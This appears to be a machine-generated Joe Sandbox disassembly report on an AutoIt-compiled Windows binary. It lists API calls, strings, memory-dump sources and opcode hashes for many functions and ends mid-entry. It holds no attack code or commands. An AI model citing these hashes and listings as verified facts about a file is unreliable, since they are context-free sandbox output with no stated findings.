                                                                                              • Opcode ID: 414589bff7bcb1546387bc725d84ba4b2123d33bc636ee0dff66dbc083ac875c
                                                                                              • Instruction ID: cf08520674afdcb29da68b3e913330b79290bf013ec7845b963e1aef556831fe
                                                                                              • Opcode Fuzzy Hash: 414589bff7bcb1546387bc725d84ba4b2123d33bc636ee0dff66dbc083ac875c
                                                                                              • Instruction Fuzzy Hash: EE32E230608741EFD724DF24D848BAABBE1FF85304F18852DE59687292D771E948DBB2

                                                                                              Control-flow Graph (entry block 00D63696; interactive graph, node/edge listing not reproduced)
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00D63690,?,?), ref: 00D636FE
                                                                                              • KillTimer.USER32(?,00000001,?,?,?,?,?,00D63690,?,?), ref: 00D6372A
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D6374D
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00D63690,?,?), ref: 00D63758
                                                                                              • CreatePopupMenu.USER32 ref: 00D6376C
                                                                                              • PostQuitMessage.USER32(00000000), ref: 00D6378D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                              • String ID: 0$$0$$TaskbarCreated
                                                                                              • API String ID: 129472671-3836791346
                                                                                              • Opcode ID: 7658efdae5dfc04114baaaa9e7b30abca1e170d5d38c62b549648f780bd0811d
                                                                                              • Instruction ID: b79425469cef6744bc842a60f498464eaeebfe1ebf9a507117587cd665868be7
                                                                                              • Opcode Fuzzy Hash: 7658efdae5dfc04114baaaa9e7b30abca1e170d5d38c62b549648f780bd0811d
                                                                                              • Instruction Fuzzy Hash: A04123B1104249BBEB282BB8DC4EB793E67EB45310F18422DF696DA291DB74DB04D731

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00D635DE
                                                                                              • RegisterClassExW.USER32(00000030), ref: 00D63608
                                                                                              • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D63619
                                                                                              • InitCommonControlsEx.COMCTL32(?), ref: 00D63636
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D63646
                                                                                              • LoadIconW.USER32(000000A9), ref: 00D6365C
                                                                                              • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D6366B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                              • API String ID: 2914291525-1005189915
                                                                                              • Opcode ID: b8415a5e3016d0c4c1564cbb4eef35722213c4b34a3694e23c9a96a1842764b7
                                                                                              • Instruction ID: 7e07bbb0faf364d02d7ba2680dd9bdc991750ac3c2734a24b292df8a333c15da
                                                                                              • Opcode Fuzzy Hash: b8415a5e3016d0c4c1564cbb4eef35722213c4b34a3694e23c9a96a1842764b7
                                                                                              • Instruction Fuzzy Hash: 7A21E4B190130CAFDB009FA5E849BADBFB6FB08700F10811AE651EA2A0D7B45548CFA4

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00DA073A: CreateFileW.KERNELBASE(00000000,00000000,?,00DA0AA4,?,?,00000000,?,00DA0AA4,00000000,0000000C), ref: 00DA0757
                                                                                              • GetLastError.KERNEL32 ref: 00DA0B0F
                                                                                              • __dosmaperr.LIBCMT ref: 00DA0B16
                                                                                              • GetFileType.KERNELBASE(00000000), ref: 00DA0B22
                                                                                              • GetLastError.KERNEL32 ref: 00DA0B2C
                                                                                              • __dosmaperr.LIBCMT ref: 00DA0B35
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DA0B55
                                                                                              • CloseHandle.KERNEL32(?), ref: 00DA0C9F
                                                                                              • GetLastError.KERNEL32 ref: 00DA0CD1
                                                                                              • __dosmaperr.LIBCMT ref: 00DA0CD8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                              • String ID: H
                                                                                              • API String ID: 4237864984-2852464175
                                                                                              • Opcode ID: 1dd2470525e400410cf9f814af320df18d69b12db8c9ef65b65df5e0cfb3a428
                                                                                              • Instruction ID: 580dc9e1e7f2a62cdbf8e4e9f74823c9848f0fcb335721bcbec8f923f988b051
                                                                                              • Opcode Fuzzy Hash: 1dd2470525e400410cf9f814af320df18d69b12db8c9ef65b65df5e0cfb3a428
                                                                                              • Instruction Fuzzy Hash: 34A1F532A042088FDF19AF68D856BAD7FA1EB06324F18015DF815EB3E1D7359916CB72

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00D6551B: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00DA4B50,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00D65539
                                                                                                • Part of subcall function 00D651BF: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00D651E1
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00D6534B
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00DA4BD7
                                                                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00DA4C18
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00DA4C5A
                                                                                              • _wcslen.LIBCMT ref: 00DA4CC1
                                                                                              • _wcslen.LIBCMT ref: 00DA4CD0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                              • API String ID: 98802146-2727554177
                                                                                              • Opcode ID: 0bfa8992668785b3b9ead2fa1e82a283a873c022a9f2cd936e246078d8aa55c7
                                                                                              • Instruction ID: ad53ee66f4691eb8fdbf5bc9fdd1d0d252ceb617f1c76ecb50b6245b8635d3db
                                                                                              • Opcode Fuzzy Hash: 0bfa8992668785b3b9ead2fa1e82a283a873c022a9f2cd936e246078d8aa55c7
                                                                                              • Instruction Fuzzy Hash: 2F715A71104304AFC300EF66D889DAABBE8FF99750B40842EF555D71A0EB709A88CB71

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00D63465
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00D63474
                                                                                              • LoadIconW.USER32(00000063), ref: 00D6348A
                                                                                              • LoadIconW.USER32(000000A4), ref: 00D6349C
                                                                                              • LoadIconW.USER32(000000A2), ref: 00D634AE
                                                                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00D634C6
                                                                                              • RegisterClassExW.USER32(?), ref: 00D63517
                                                                                                • Part of subcall function 00D635AB: GetSysColorBrush.USER32(0000000F), ref: 00D635DE
                                                                                                • Part of subcall function 00D635AB: RegisterClassExW.USER32(00000030), ref: 00D63608
                                                                                                • Part of subcall function 00D635AB: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00D63619
                                                                                                • Part of subcall function 00D635AB: InitCommonControlsEx.COMCTL32(?), ref: 00D63636
                                                                                                • Part of subcall function 00D635AB: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00D63646
                                                                                                • Part of subcall function 00D635AB: LoadIconW.USER32(000000A9), ref: 00D6365C
                                                                                                • Part of subcall function 00D635AB: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00D6366B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                              • String ID: #$0$AutoIt v3
                                                                                              • API String ID: 423443420-4155596026
                                                                                              • Opcode ID: 69f55bdb9708e321f28290beef460391680ae8d43c6e1b74a6db9f6d75e3dc30
                                                                                              • Instruction ID: 7c686b7efb1cf2ee1ffdeef9a2621f757ff66d1f401802cb2c663e67c345b43b
                                                                                              • Opcode Fuzzy Hash: 69f55bdb9708e321f28290beef460391680ae8d43c6e1b74a6db9f6d75e3dc30
                                                                                              • Instruction Fuzzy Hash: 83213A71D0031DAFDB109FA6EC49AA9BFB6FB48B50F10401EE645B63A0C3B94549CFA0
                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 00D6CE8E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID: p3$p3$p3$p3$p5$p5$x3$x3
                                                                                              • API String ID: 1385522511-2512158659
                                                                                              • Opcode ID: 4351fded9667973c0a3c23773dee132ce4f37b4c0bf3a5854082bd027d96eb27
                                                                                              • Instruction ID: 14f718694c8d2ddb83bb0ed57622a9c7058b69f281ca9baf33f3bb718a9bb511
                                                                                              • Opcode Fuzzy Hash: 4351fded9667973c0a3c23773dee132ce4f37b4c0bf3a5854082bd027d96eb27
                                                                                              • Instruction Fuzzy Hash: EF32D279A00209DFCB24CF68C895EBE7BB5EF44300F698059E896AB251D774ED45CBB0

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00D67953: CloseHandle.KERNELBASE(?,?,00000000,00DA3A1C), ref: 00D67973
                                                                                                • Part of subcall function 00D66E52: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00D63B33,?,00008000), ref: 00D66E80
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00D63C17
                                                                                              • _wcslen.LIBCMT ref: 00D63C96
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00D63D81
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
                                                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                              • API String ID: 3350465876-3738523708
                                                                                              • Opcode ID: 03d1a22e5458bab5ea7e0d624ccfea3365ff2e00e27933c6e673bd3e54c2bde1
                                                                                              • Instruction ID: aecc04d5d9308fcbb90367431d23cca583c4cb6f6a93d3c55f31def2f93f8470
                                                                                              • Opcode Fuzzy Hash: 03d1a22e5458bab5ea7e0d624ccfea3365ff2e00e27933c6e673bd3e54c2bde1
                                                                                              • Instruction Fuzzy Hash: 93228B315083419FC714EF24C891AAEBBE5EFD9314F04491EF585972A2DBB1DA48CB72
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: D5$D5$D5$D5$D5$Variable must be of type 'Object'.
                                                                                              • API String ID: 0-3824067622
                                                                                              • Opcode ID: cd0eaf4cea74518f2d5e17a10b4212596d5b8232067fe702758b93c2661c13de
                                                                                              • Instruction ID: d62eed0031e96329015fc6e9453099e7abb53dd3f42097ab5c080fc1e00c8703
                                                                                              • Opcode Fuzzy Hash: cd0eaf4cea74518f2d5e17a10b4212596d5b8232067fe702758b93c2661c13de
                                                                                              • Instruction Fuzzy Hash: 41C27A75A00604DFCB24CF98D881AADBBB1FF09310F288169E955AB392D775ED45CBB0
                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 00D715A2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID: D5$D5$D5$D5$D5
                                                                                              • API String ID: 1385522511-586526777
                                                                                              • Opcode ID: 908769b5b7582a5d8bc04c34d9ffeb4023b7a6ebc831d1f7480b7034d2d6a5e9
                                                                                              • Instruction ID: 2e377e5883f5b6714811f5894e000b382c337206cc590a7d8eb176dffa62e139
                                                                                              • Opcode Fuzzy Hash: 908769b5b7582a5d8bc04c34d9ffeb4023b7a6ebc831d1f7480b7034d2d6a5e9
                                                                                              • Instruction Fuzzy Hash: C0B28E74608340CFD724DF18C480A2ABBE1FF89714F18895DE99A9B391E771ED45CBA2

                                                                                              Control-flow Graph (rendered graph of executed / not-executed basic blocks; the raw graph data is not reproduced here)
                                                                                              APIs
                                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D62A9B
                                                                                              • CoUninitialize.COMBASE ref: 00D62B3A
                                                                                              • UnregisterHotKey.USER32(?), ref: 00D62D1F
                                                                                              • DestroyWindow.USER32(?), ref: 00DA39F5
                                                                                              • FreeLibrary.KERNEL32(?), ref: 00DA3A5A
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00DA3A87
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                              • String ID: close all
                                                                                              • API String ID: 469580280-3243417748
                                                                                              • Opcode ID: 3849d99b6b3aa9792e01f3c3ae01b06579835a6c88d1e8049533baf87a611676
                                                                                              • Instruction ID: ddc5fee561793217caa5efe2ebddb2805653b123c1b2cd218df20ed4c5a69ffc
                                                                                              • Opcode Fuzzy Hash: 3849d99b6b3aa9792e01f3c3ae01b06579835a6c88d1e8049533baf87a611676
                                                                                              • Instruction Fuzzy Hash: 1DD15A317016128FCB19EF54C489A69F7A2FF05710F1581ADE98AAB251CB70ED16CFB1

                                                                                              Control-flow Graph (rendered graph of executed / not-executed basic blocks; the raw graph data is not reproduced here)
                                                                                              APIs
                                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DD8907
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 00DD891B
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00DD8945
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00DD895F
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DD8971
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00DD89BA
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?), ref: 00DD8A0A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentDirectory$AttributesFile
                                                                                              • String ID: *.*
                                                                                              • API String ID: 769691225-438819550
                                                                                              • Opcode ID: 1cf403313e88e2eb472fea212489496aef50eba2e483e082149f4679e8a9a8ef
                                                                                              • Instruction ID: c0e32098fa1a27885c8d7c0788d3bfd9f2acb96b3ce1fce66d9cfc81543bb981
                                                                                              • Opcode Fuzzy Hash: 1cf403313e88e2eb472fea212489496aef50eba2e483e082149f4679e8a9a8ef
                                                                                              • Instruction Fuzzy Hash: 1F818C725043419BCB21EF58C494AAAB3E9FB88310F58481BF4C5D7351DB35E945EBB2

                                                                                              Control-flow Graph (rendered graph of executed / not-executed basic blocks; the raw graph data is not reproduced here)
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bccb2f148c05c21d3f179fae3446f65cce46f4ac1df4277f6b3822bb50690bf2
                                                                                              • Instruction ID: 4c9d14735ac77490054030dbac57916cb52cb5aa4d3608d8fcce540fe128025a
                                                                                              • Opcode Fuzzy Hash: bccb2f148c05c21d3f179fae3446f65cce46f4ac1df4277f6b3822bb50690bf2
                                                                                              • Instruction Fuzzy Hash: BFC1EFB0A04349AFCF11EFADC855BADBBB4AF09300F18419DE954A73A2D7349942CB75
                                                                                              APIs
                                                                                                • Part of subcall function 00D63205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00D63236
                                                                                                • Part of subcall function 00D63205: MapVirtualKeyW.USER32(00000010,00000000), ref: 00D6323E
                                                                                                • Part of subcall function 00D63205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00D63249
                                                                                                • Part of subcall function 00D63205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00D63254
                                                                                                • Part of subcall function 00D63205: MapVirtualKeyW.USER32(00000011,00000000), ref: 00D6325C
                                                                                                • Part of subcall function 00D63205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00D63264
                                                                                                • Part of subcall function 00D6318C: RegisterWindowMessageW.USER32(00000004,?,00D62906), ref: 00D631E4
                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00D629AC
                                                                                              • OleInitialize.OLE32 ref: 00D629CA
                                                                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 00DA39E7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                              • String ID: (&$0$$@($$
                                                                                              • API String ID: 1986988660-84382417
                                                                                              • Opcode ID: 357ba898fa26282c4b383645b1e37d890a64b347c26627dd266829489f0ee509
                                                                                              • Instruction ID: 90babe576731720383223035d21e43a6ab444730d75c094195bd915c8913b8b7
                                                                                              • Opcode Fuzzy Hash: 357ba898fa26282c4b383645b1e37d890a64b347c26627dd266829489f0ee509
                                                                                              • Instruction Fuzzy Hash: E3718EB0901208AF8788DF7AAC6E6153EE1FB88304711912ED3D8E7361E7714649CF66
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D63568
                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D63589
                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D632EF,?), ref: 00D6359D
                                                                                              • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D632EF,?), ref: 00D635A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2402906567.0000000000D61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D60000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2402881524.0000000000D60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000DFD000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2402959404.0000000000E23000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403006628.0000000000E2D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000008.00000002.2403030533.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_d60000_bpqdpksed.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CreateShow
                                                                                              • String ID: AutoIt v3$edit
                                                                                              • API String ID: 1584632944-3779509399
APIs
• LoadLibraryA.KERNEL32 ref: 00DBE72B
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DBE73D
